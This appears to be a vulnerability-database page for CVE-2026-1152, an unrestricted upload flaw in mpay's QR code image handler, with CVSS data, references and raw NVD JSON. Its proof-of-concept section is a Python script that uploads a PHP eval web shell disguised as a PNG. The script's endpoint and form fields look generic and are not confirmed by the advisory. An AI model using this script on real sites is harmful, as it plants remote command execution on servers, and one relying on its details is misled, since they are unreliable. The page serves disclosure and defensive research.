CVE-2026-1152

Description

A security vulnerability has been detected in technical-laohu mpay up to 1.2.4. The impacted element is an unknown function of the component QR Code Image Handler. Such manipulation of the argument codeimg leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:technical-laohu:mpay:*:*:*:*:*:*:*:* - VULNERABLE

technical-laohu mpay <= 1.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1152 PoC - Unrestricted File Upload in mpay QR Code Image Handler
# Affected: technical-laohu mpay up to 1.2.4

TARGET_URL = "http://target.com/mpay"  # Replace with target URL

def upload_webshell():
    """
    Upload malicious file via codeimg parameter in QR Code Image Handler
    """
    # Prepare malicious PHP webshell
    webshell_content = "<?php @eval($_POST['cmd']); ?>"
    
    # Prepare multipart form data
    files = {
        'codeimg': ('shell.php', webshell_content, 'image/png')
    }
    
    # Alternative: Try with different content types
    data = {
        'action': 'upload',
        'component': 'qrcode'
    }
    
    try:
        # Attempt file upload
        response = requests.post(
            f"{TARGET_URL}/qrcode/upload",
            files=files,
            data=data,
            timeout=10
        )
        
        if response.status_code == 200:
            # Extract uploaded file path from response
            result = response.json()
            uploaded_path = result.get('path', '')
            print(f"[+] File uploaded successfully: {uploaded_path}")
            print(f"[+] Access webshell at: {TARGET_URL}/{uploaded_path}")
            return uploaded_path
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2026-1152 PoC - mpay QR Code Unrestricted Upload")
    print("=" * 50)
    upload_webshell()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1152
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1152
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1152/
[4] VulDB https://vuldb.com/cve/CVE-2026-1152
[5] https://github.com/bdkuzma/vuln/issues/17
[6] https://vuldb.com/?ctiid.341745
[7] https://vuldb.com/?id.341745
[8] https://vuldb.com/?submit.735775

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1152", "sourceIdentifier": "[email protected]", "published": "2026-01-19T12:15:51.980", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in technical-laohu mpay up to 1.2.4. The impacted element is an unknown function of the component QR Code Image Handler. Such manipulation of the argument codeimg leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed publicly and may be used."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en technical-laohu mpay hasta 1.2.4. El elemento afectado es una función desconocida del componente QR Code Image Handler. Dicha manipulación del argumento codeimg conduce a una carga sin restricciones. El ataque puede ser lanzado de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:technical-laohu:mpay:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.4", "matchCriteriaId": "C5DCECBB-D75E-42B4-89F2-76CA77FD1A51"}]}]}], "references": [{"url": "https://github.com/bdkuzma/vuln/issues/17", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341745", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341745", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.735775", "source": "[email protected]", "tags": [" ... (truncated)